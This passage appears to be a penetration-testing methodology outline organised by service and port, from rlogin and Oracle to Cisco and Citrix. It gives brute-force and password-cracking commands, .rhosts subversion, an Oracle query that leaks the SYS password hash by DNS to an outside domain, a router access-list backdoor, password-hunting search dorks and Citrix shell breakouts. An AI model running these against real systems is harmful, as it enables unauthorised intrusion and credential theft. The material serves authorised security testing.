14.14.3.4. Netscape Directory Server 4

14.14.3.4.1. nsslapd.sas_at.conf

14.14.3.4.2. nsslapd.sas_oc.conf

14.14.3.5. OpenLDAP directory server

14.14.3.5.1. slapd.sas_at.conf

14.14.3.5.2. slapd.sas_oc.conf

14.14.3.6. Sun ONE Directory Server 5.1

14.14.3.6.1. 75sas.ldif

14.15. PPTP/L2TP/VPN port 500/1723 open

14.15.1. Enumeration

14.15.1.1. ike-scan

14.15.1.2. ike-probe

14.15.2. Brute-Force

14.15.2.1. ike-crack

14.15.3. Reference Material

14.15.3.1. PSK cracking paper

14.15.3.2. SecurityFocus Infocus

14.15.3.3. Scanning a VPN Implementation

14.16. Modbus port 502 open

14.16.1. modscan

14.17. rlogin port 513 open

14.17.1. Rlogin Enumeration

14.17.1.1. Find the files

14.17.1.1.1. find / -name .rhosts

14.17.1.1.2. locate .rhosts

14.17.1.2. Examine Files

14.17.1.2.1. cat .rhosts

14.17.1.3. Manual Login

14.17.1.3.1. rlogin hostname -l username

14.17.1.3.2. rlogin <IP>

14.17.1.4. Subvert the files

14.17.1.4.1. echo ++ > .rhosts

14.17.2. Rlogin Brute force

14.17.2.1. Hydra

14.18. rsh port 514 open

14.18.1. Rsh Enumeration

14.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

14.18.2. Rsh Brute Force

14.18.2.1. rsh-grind

14.18.2.2. Hydra

14.18.2.3. medusa

14.19. SQL Server Port 1433 1434 open

14.19.1. SQL Enumeration

14.19.1.1. piggy

14.19.1.2. SQLPing

14.19.1.2.1. sqlping ip_address/hostname

14.19.1.3. SQLPing2

14.19.1.4. SQLPing3

14.19.1.5. SQLpoke

14.19.1.6. SQL Recon

14.19.1.7. SQLver

14.19.2. SQL Brute Force

14.19.2.1. SQLPAT

14.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

14.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

14.19.2.2. SQL Dict

14.19.2.3. SQLAT

14.19.2.4. Hydra

14.19.2.5. SQLlhf

14.19.2.6. ForceSQL

14.20. Citrix port 1494 open

14.20.1. Citrix Enumeration

14.20.1.1. Default Domain

14.20.1.2. Published Applications

14.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

14.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

14.20.2. Citrix Brute Force

14.20.2.1. bforce.js

14.20.2.2. connect.js

14.20.2.3. Citrix Brute-forcer

14.20.2.4. Reference Material

14.20.2.4.1. Hacking Citrix - the legitimate backdoor

14.20.2.4.2. Hacking Citrix - the forceful way

14.21. Oracle Port 1521 Open

14.21.1. Oracle Enumeration

14.21.1.1. oracsec

14.21.1.2. Repscan

14.21.1.3. Sidguess

14.21.1.4. Scuba

14.21.1.5. DNS/HTTP Enumeration

14.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

14.21.1.6. WinSID

14.21.1.7. Oracle default password list

14.21.1.8. TNSVer

14.21.1.8.1. tnsver host [port]

14.21.1.9. TCP Scan

14.21.1.10. Oracle TNSLSNR

14.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

14.21.1.11. TNSCmd

14.21.1.11.1. perl tnscmd.pl -h ip_address

14.21.1.11.2. perl tnscmd.pl version -h ip_address

14.21.1.11.3. perl tnscmd.pl status -h ip_address

14.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

14.21.1.12. LSNrCheck

14.21.1.13. Oracle Security Check (needs credentials)

14.21.1.14. OAT

14.21.1.14.1. sh opwg.sh -s ip_address

14.21.1.14.2. opwg.bat -s ip_address

14.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

14.21.1.15. OScanner

14.21.1.15.1. sh oscanner.sh -s ip_address

14.21.1.15.2. oscanner.exe -s ip_address

14.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

14.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

14.21.1.16. NGS Squirrel for Oracle

14.21.1.17. Service Register

14.21.1.17.1. Service-register.exe ip_address

14.21.1.18. PLSQL Scanner 2008

14.21.2. Oracle Brute Force

14.21.2.1. OAK

14.21.2.1.1. ora-getsid hostname port sid_dictionary_list

14.21.2.1.2. ora-auth-alter-session host port sid username password sql

14.21.2.1.3. ora-brutesid host port start

14.21.2.1.4. ora-pwdbrute host port sid username password-file

14.21.2.1.5. ora-userenum host port sid userlistfile

14.21.2.1.6. ora-ver -e (-f -l -a) host port

14.21.2.2. breakable (Targets Application Server Port)

14.21.2.2.1. breakable.exe host url [port] [v] (host = ip_address of the Oracle Portal Server; url = PATH_INFO, i.e. /pls/orasso; port = TCP port the Oracle Portal Server is serving pages from; v = verbose)

14.21.2.3. SQLInjector (Targets Application Server Port)

14.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

14.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

14.21.2.4. Check Password

14.21.2.5. orabf

14.21.2.5.1. orabf [hash]:[username] [options]

14.21.2.6. thc-orakel

14.21.2.6.1. Cracker

14.21.2.6.2. Client

14.21.2.6.3. Crypto

14.21.2.7. DBVisualisor

14.21.2.7.1. Sql scripts from pentest.co.uk

14.21.2.7.2. Manual SQL input of previously reported vulnerabilities

14.21.3. Oracle Reference Material

14.21.3.1. Understanding SQL Injection

14.21.3.2. SQL Injection walkthrough

14.21.3.3. SQL Injection by example

14.21.3.4. Advanced SQL Injection in Oracle databases

14.21.3.5. Blind SQL Injection

14.21.3.6. SQL Cheatsheets

14.21.3.6.1. Untitled

14.22. NFS Port 2049 open

14.22.1. NFS Enumeration

14.22.1.1. showmount -e hostname/ip_address

14.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

14.22.2. NFS Brute Force

14.22.2.1. Interact with NFS share and try to add/delete

14.22.2.2. Exploit and Confuse Unix

14.22.3. Examine Configuration Files

14.22.3.1. /etc/exports

14.22.3.2. /etc/lib/nfs/xtab

14.22.4. nmap nse script

14.22.4.1. nfs-showmount

14.23. Compaq/HP Insight Manager Port 2301, 2381 open

14.23.1. HP Enumeration

14.23.1.1. Authentication Method

14.23.1.1.1. Host OS Authentication

14.23.1.1.2. Default Authentication

14.23.1.2. Wikto

14.23.1.3. Nstealth

14.23.2. HP Bruteforce

14.23.2.1. Hydra

14.23.2.2. Acunetix

14.23.3. Examine Configuration Files

14.23.3.1. path.properties

14.23.3.2. mx.log

14.23.3.3. CLIClientConfig.cfg

14.23.3.4. database.props

14.23.3.5. pg_hba.conf

14.23.3.6. jboss-service.xml

14.23.3.7. .namazurc

14.24. MySQL port 3306 open

14.24.1. Enumeration

14.24.1.1. nmap -A -n -p3306 <IP Address>

14.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

14.24.1.3. telnet IP_Address 3306

14.24.1.4. use test; select * from test;

14.24.1.5. To check for other DB's -- show databases

14.24.2. Administration

14.24.2.1. MySQL Network Scanner

14.24.2.2. MySQL GUI Tools

14.24.2.3. mysqlshow

14.24.2.4. mysqlbinlog

14.24.3. Manual Checks

14.24.3.1. Default usernames and passwords

14.24.3.1.1. username: root password:

14.24.3.1.2. testing

14.24.3.2. Configuration Files

14.24.3.2.1. Operating System

14.24.3.2.2. Command History

14.24.3.2.3. Log Files

14.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

14.24.3.2.5. MySQL data directory (Location specified in my.cnf)

14.24.3.2.6. SSL Check

14.24.3.3. Privilege Escalation

14.24.3.3.1. Current Level of access

14.24.3.3.2. Access passwords

14.24.3.3.3. Create a new user and grant him privileges

14.24.3.3.4. Break into a shell

14.24.4. SQL injection

14.24.4.1. mysql-miner.pl

14.24.4.1.1. mysql-miner.pl http://target/ expected_string database

14.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

14.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

14.24.5. References.

14.24.5.1. Design Weaknesses

14.24.5.1.1. MySQL running as root

14.24.5.1.2. Exposed publicly on Internet

14.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

14.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

14.25. RDesktop port 3389 open

14.25.1. Rdesktop Enumeration

14.25.1.1. Remote Desktop Connection

14.25.2. Rdesktop Bruteforce

14.25.2.1. TSGrinder

14.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

14.25.2.2. Tscrack

14.26. Sybase Port 5000+ open

14.26.1. Sybase Enumeration

14.26.1.1. sybase-version ip_address from NGS

14.26.2. Sybase Vulnerability Assessment

14.26.2.1. Use DBVisualiser

14.26.2.1.1. Sybase Security checksheet

14.26.2.1.2. Manual SQL input of previously reported vulnerabilities

14.26.2.2. NGS Squirrel for Sybase

14.27. SIP Port 5060 open

14.27.1. SIP Enumeration

14.27.1.1. netcat

14.27.1.1.1. nc IP_Address Port

14.27.1.2. sipflanker

14.27.1.2.1. python sipflanker.py 192.168.1-254

14.27.1.3. Sipscan

14.27.1.4. smap

14.27.1.4.1. smap IP_Address/Subnet_Mask

14.27.1.4.2. smap -o IP_Address/Subnet_Mask

14.27.1.4.3. smap -l IP_Address

14.27.2. SIP Packet Crafting etc.

14.27.2.1. sipsak

14.27.2.1.1. Tracing paths:- sipsak -T -s sip:username@domain

14.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain

14.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

14.27.2.2. siprogue

14.27.3. SIP Vulnerability Scanning/ Brute Force

14.27.3.1. tftp bruteforcer

14.27.3.1.1. Default dictionary file

14.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

14.27.3.2. VoIPaudit

14.27.3.3. SiVuS

14.27.4. Examine Configuration Files

14.27.4.1. SIPDefault.cnf

14.27.4.2. asterisk.conf

14.27.4.3. sip.conf

14.27.4.4. phone.conf

14.27.4.5. sip_notify.conf

14.27.4.6. <Ethernet address>.cfg

14.27.4.7. 000000000000.cfg

14.27.4.8. phone1.cfg

14.27.4.9. sip.cfg etc. etc.

14.28. VNC port 5900^ open

14.28.1. VNC Enumeration

14.28.1.1. Scans

14.28.1.1.1. 5900^ for direct access. 5800 for HTTP access.

14.28.2. VNC Brute Force

14.28.2.1. Password Attacks

14.28.2.1.1. Remote

14.28.2.1.2. Local

14.28.3. Examine Configuration Files

14.28.3.1. .vnc

14.28.3.2. /etc/vnc/config

14.28.3.3. $HOME/.vnc/config

14.28.3.4. /etc/sysconfig/vncservers

14.28.3.5. /etc/vnc.conf

14.29. Tor Port 9001, 9030 open

14.29.1. Tor Node Checker

14.29.1.1. Ip Pages

14.29.1.2. Kewlio.net

14.29.2. nmap NSE script

14.30. Jet Direct 9100 open

14.30.1. hijetta

15. Password cracking

15.1. Rainbow crack

15.1.1. ophcrack

15.1.2. rainbow tables

15.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

15.2. Ophcrack

15.3. Cain & Abel

15.4. John the Ripper

15.4.1. ./unshadow passwd shadow > file_to_crack

15.4.2. ./john -single file_to_crack

15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

15.4.4. ./john -show file_to_crack

15.4.5. ./john --incremental:All file_to_crack

15.5. fgdump

15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

15.6. pwdump6

15.7. medusa

15.8. LCP

15.9. L0phtcrack (Note:- This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)

15.9.1. Domain credentials

15.9.2. Sniffing

15.9.3. pwdump import

15.9.4. sam import

15.10. aiocracker

15.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

16. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any Common Vulnerabilities and Exploits (CVE) entries that have been released, and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

16.1. Manual

16.1.1. Patch Levels

16.1.2. Confirmed Vulnerabilities

16.1.2.1. Severe

16.1.2.2. High

16.1.2.3. Medium

16.1.2.4. Low

16.2. Automated

16.2.1. Reports

16.2.2. Vulnerabilities

16.2.2.1. Severe

16.2.2.2. High

16.2.2.3. Medium

16.2.2.4. Low

16.3. Tools

16.3.1. GFI

16.3.2. Nessus (Linux)

16.3.2.1. Nessus (Windows)

16.3.3. NGS Typhon

16.3.4. NGS Squirrel for Oracle

16.3.5. NGS Squirrel for SQL

16.3.6. SARA

16.3.7. MatriXay

16.3.8. BiDiBlah

16.3.9. SSA

16.3.10. Oval Interpreter

16.3.11. Xscan

16.3.12. Security Manager +

16.3.13. Inguma

16.4. Resources

16.4.1. Security Focus

16.4.2. Microsoft Security Bulletin

16.4.3. Common Vulnerabilities and Exploits (CVE)

16.4.4. National Vulnerability Database (NVD)

16.4.5. The Open Source Vulnerability Database (OSVDB)

16.4.5.1. Standalone Database

16.4.5.1.1. Update URL

16.4.6. United States Computer Emergency Response Team (US-CERT)

16.4.7. Computer Emergency Response Team

16.4.8. Mozilla Security Information

16.4.9. SANS

16.4.10. Securiteam

16.4.11. PacketStorm Security

16.4.12. Security Tracker

16.4.13. Secunia

16.4.14. Vulnerabilities.org

16.4.15. ntbugtraq

16.4.16. Wireless Vulnerabilities and Exploits (WVE)

16.5. Blogs

16.5.1. Carnal0wnage

16.5.2. Fsecure Blog

16.5.3. g0ne blog

16.5.4. GNUCitizen

16.5.5. ha.ckers Blog

16.5.6. Jeremiah Grossman Blog

16.5.7. Metasploit

16.5.8. nCircle Blogs

16.5.9. pentestmonkey.net

16.5.10. Rational Security

16.5.12. Rise Security

16.5.13. Security Fix Blog

16.5.14. Software Vulnerability Exploitation Blog

16.5.16. Taosecurity Blog

17. AS/400 Auditing

17.1. Remote

17.1.1. Information Gathering

17.1.1.1. Nmap using common iSeries (AS/400) services.

17.1.1.1.1. Unsecured services (Port;name;description)

17.1.1.1.2. Secured services (Port;name;description)

17.1.1.2. NetCat (old school technique)

17.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

17.1.1.3. Banner Grabbing

17.1.1.3.1. Telnet

17.1.1.3.2. FTP

17.1.1.3.3. HTTP Banner

17.1.1.3.4. POP3

17.1.1.3.5. SNMP

17.1.1.3.6. SMTP

17.1.2. Users Enumeration

17.1.2.1. Default AS/400 user accounts

17.1.2.2. Error messages

17.1.2.2.1. Telnet Login errors

17.1.2.2.2. POP3 authentication Errors

17.1.2.3. Qsys symbolic link (if ftp is enabled)

17.1.2.3.1. ftp target | quote stat | quote site namefmt 1

17.1.2.3.2. cd /

17.1.2.3.3. quote site listfmt 1

17.1.2.3.4. mkdir temp

17.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

17.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

17.1.2.3.7. dir /temp/qsys/*.usrprf

17.1.2.4. LDAP

17.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

17.1.2.4.2. Tool to browse LDAP

17.1.3. Exploitation

17.1.3.1. CVE References

17.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

17.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

17.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

17.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

17.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

17.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

17.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

17.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

17.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

17.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

17.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

17.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

17.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

17.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

17.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

17.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

17.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

17.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

17.1.3.2. Access with Work Station Gateway

17.1.3.2.1. http://target:5061/WSG

17.1.3.2.2. Default AS/400 accounts.

17.1.3.3. Network attacks (next release)

17.1.3.3.1. DB2

17.1.3.3.2. QSHELL

17.1.3.3.3. Hijacking Terminals

17.1.3.3.4. Trojan attacks

17.1.3.3.5. Hacking from AS/400

17.2. Local

17.2.1. System Value Security

17.2.1.1. Untitled

17.2.1.1.1. Untitled

17.2.1.2. Untitled

17.2.1.2.1. Untitled

17.2.1.3. Untitled

17.2.1.3.1. Untitled

17.2.1.4. Untitled

17.2.1.4.1. Recommended value is 30

17.2.2. Password Policy

17.2.2.1. Untitled

17.2.2.1.1. Untitled

17.2.2.1.2. Untitled

17.2.2.2. Untitled

17.2.2.2.1. Untitled

17.2.2.3. Untitled

17.2.2.3.1. Untitled

17.2.2.4. Untitled

17.2.2.4.1. Untitled

17.2.2.5. Untitled

17.2.3. Audit level

17.2.3.1. Untitled

17.2.3.1.1. Recommended value is *SECURITY

17.2.4. Documentation

17.2.4.1. Users class

17.2.4.1.1. Untitled

17.2.4.2. System Audit Settings

17.2.4.2.1. Untitled

17.2.4.3. Special Authorities Definitions

17.2.4.3.1. Untitled

18. Bluetooth Specific Testing

18.1. Bluescanner

18.2. Bluesweep

18.3. btscanner

18.4. Redfang

18.5. Blueprint

18.6. Bluesnarfer

18.7. Bluebugger

18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

18.8. Blueserial

18.9. Bloover

18.10. Bluesniff

18.11. Exploit Frameworks

18.11.1. BlueMaho

18.11.1.1. Untitled

18.12. Resources

18.12.1. URLs

18.12.1.1. BlueStumbler.org

18.12.1.2. Bluejackq.com

18.12.1.3. Bluejacking.com

18.12.1.4. Bluejackers

18.12.1.5. bluetooth-pentest

18.12.1.6. ibluejackedyou.com

18.12.1.7. Trifinite

18.12.2. Vulnerability Information

18.12.2.1. Common Vulnerabilities and Exploits (CVE)

18.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

18.12.3. White Papers

18.12.3.1. Bluesnarfing

19. Cisco Specific Testing

19.1. Methodology

19.1.1. Scan & Fingerprint.

19.1.1.1. Untitled

19.1.1.2. Untitled

19.1.1.3. If SNMP is active, then community string guessing should be performed.

19.1.2. Credentials Guessing.

19.1.2.1. Untitled

19.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

19.1.3. Connect

19.1.3.1. Untitled

19.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

19.1.4. Check for bugs

19.1.4.1. Untitled

19.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.

19.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

19.1.5. Further your attack

19.1.5.1. Untitled

19.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.

19.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

19.1.5.2. Untitled

19.1.5.2.1. #> access-list 100 permit ip <IP> any

19.2. Scan & Fingerprint.

19.2.1. Port Scanning

19.2.1.1. nmap

19.2.1.1.1. Untitled

19.2.1.2. Other tools

19.2.1.2.1. Untitled

19.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

19.2.2. Fingerprinting

19.2.2.1. Untitled

19.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

19.2.2.2. Untitled

19.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

19.2.2.2.2. Untitled

19.3. Password Guessing.

19.3.1. Untitled

19.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

19.3.1.2. Untitled

19.3.2. Untitled

19.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

19.3.2.2. Untitled

19.3.3. Untitled

19.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

19.3.3.2. Untitled

19.4. SNMP Attacks.

19.4.1. Untitled

19.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

19.4.1.2. Untitled

19.4.2. Untitled

19.4.2.1. onesixtyone -c SNMP.wordlist <IP>

19.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

19.4.3. Untitled

19.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

19.4.3.2. Untitled

19.5. Connecting.

19.5.1. Telnet

19.5.1.1. Untitled

19.5.1.1.1. telnet <IP>

19.5.1.1.2. Sample Banners

19.5.2. SSH

19.5.3. Web Browser

19.5.3.1. Untitled

19.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

19.5.3.1.2. Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:

19.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

19.5.4. TFTP

19.5.4.1. Untitled

19.5.4.1.1. Untitled

19.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

19.5.4.2. Untitled

19.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

19.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

19.5.4.2.3. Creating backdoors in Cisco IOS using TCL

19.6. Known Bugs.

19.6.1. Attack Tools

19.6.1.1. Untitled

19.6.1.1.1. Untitled

19.6.1.2. Untitled

19.6.1.2.1. Web browse to the Cisco device: http://<IP>

19.6.1.2.2. Untitled

19.6.1.2.3. Untitled

19.6.1.2.4. Untitled

19.6.1.3. Untitled

19.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

19.6.2. Common Vulnerabilities and Exploits (CVE) Information

19.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

19.7. Configuration Files.

19.7.1. Untitled

19.7.1.1. Configuration files explained

19.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.

19.7.1.1.2. Untitled

19.7.1.1.3. Untitled

19.7.1.1.4. Password Encryption Utilised

19.7.1.1.5. Untitled

19.7.1.2. Configuration Testing Tools

19.7.1.2.1. Nipper

19.7.1.2.2. fwauto (Beta)

19.8. References.

19.8.1. Cisco IOS Exploitation Techniques

20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.

20.2. Enumeration

20.2.1. web search

20.2.1.1. Google (GHDB)

20.2.1.1.1. ext:ica

20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

20.2.1.1.3. [WFClient] Password= filetype:ica

20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

20.2.1.1.6. inurl:/Citrix/Nfuse17/

20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

20.2.1.2. Google Hacks (Author Discovered)

20.2.1.2.1. filetype:ica Username=

20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

20.2.1.2.3. inurl:/Citrix/AccessPlatform/

20.2.1.2.4. inurl:LogonAgent/Login.asp

20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

20.2.1.2.7. inurl:/Citrix/NFuse16

20.2.1.2.8. inurl:/Citrix/NFuse151/

20.2.1.2.9. allintitle:MetaFrame XP Login

20.2.1.2.10. allintitle:MetaFrame Presentation Server Login

20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

20.2.1.3. Yahoo

20.2.1.3.1. originurlextension:ica

20.2.2. site search

20.2.2.1. Manual

20.2.2.1.1. review web page for useful information

20.2.2.1.2. review source for web page

20.2.3. generic

20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

20.2.3.2. amap -bqv ip_address port_no.

20.2.4. citrix specific

20.2.4.1. enum.pl

20.2.4.1.1. perl enum.pl ip_address

20.2.4.2. enum.js

20.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

20.2.4.3. connect.js

20.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

20.2.4.4. Citrix-pa-scan

20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

20.2.4.5. pabrute.c

20.2.4.5.1. ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports

20.2.5.1. TCP

20.2.5.1.1. Citrix XML Service

20.2.5.1.2. Advanced Management Console

20.2.5.1.3. Citrix SSL Relay

20.2.5.1.4. ICA sessions

20.2.5.1.5. Server to server

20.2.5.1.6. Management Console to server

20.2.5.1.7. Session Reliability (Auto-reconnect)

20.2.5.1.8. License Management Console

20.2.5.1.9. License server

20.2.5.2. UDP

20.2.5.2.1. Clients to ICA browser service

20.2.5.2.2. Server-to-server

20.2.6. nmap nse scripts

20.2.6.1. citrix-enum-apps

20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

20.2.6.2. citrix-enum-apps-xml

20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

20.2.6.3. citrix-enum-servers

20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

20.2.6.4. citrix-enum-servers-xml

20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

20.2.6.5. citrix-brute-xml

20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus

20.3.1.1. Plugins

20.3.1.1.1. CGI abuses

20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

20.3.1.1.3. Misc.

20.3.1.1.4. Service Detection

20.3.1.1.5. Web Servers

20.3.1.1.6. Windows

20.3.2. Nikto

20.3.2.1. perl nikto.pl -host ip_address -port port_no.

20.3.2.1.1. Untitled

20.4. Exploitation

20.4.1. Alter default .ica files

20.4.1.1. InitialProgram=cmd.exe

20.4.1.2. InitialProgram=explorer.exe

20.4.2. Enumerate and Connect

20.4.2.1. For applications identified by Citrix-pa-scan

20.4.2.1.1. Pas

20.4.2.2. For published applications with a Citrix client when the master browser is non-public.

20.4.2.2.1. Citrix-pa-proxy

20.4.3. Manual Testing

20.4.3.1. Create Batch File (cmd.bat)

20.4.3.1.1. 1

20.4.3.1.2. 2

20.4.3.2. Host Scripting File (cmd.vbs)

20.4.3.2.1. Option Explicit

20.4.3.2.2. Dim objShell

20.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

20.4.3.2.4. objShell.Run "%comspec% /k"

20.4.3.2.5. WScript.Quit

20.4.3.2.6. alternative functionality

20.4.3.3. iKat

20.4.3.3.1. Integrated Kiosk Attack Tool

20.4.3.4. AT Command - privilege escalation

20.4.3.4.1. AT HH:MM /interactive "cmd.exe"

20.4.3.4.2. AT HH:MM /interactive %comspec% /k

20.4.3.4.3. Untitled

20.4.3.5. Keyboard Shortcuts/ Hotkeys

20.4.3.5.1. Ctrl + h – View History

20.4.3.5.2. Ctrl + n – New Browser

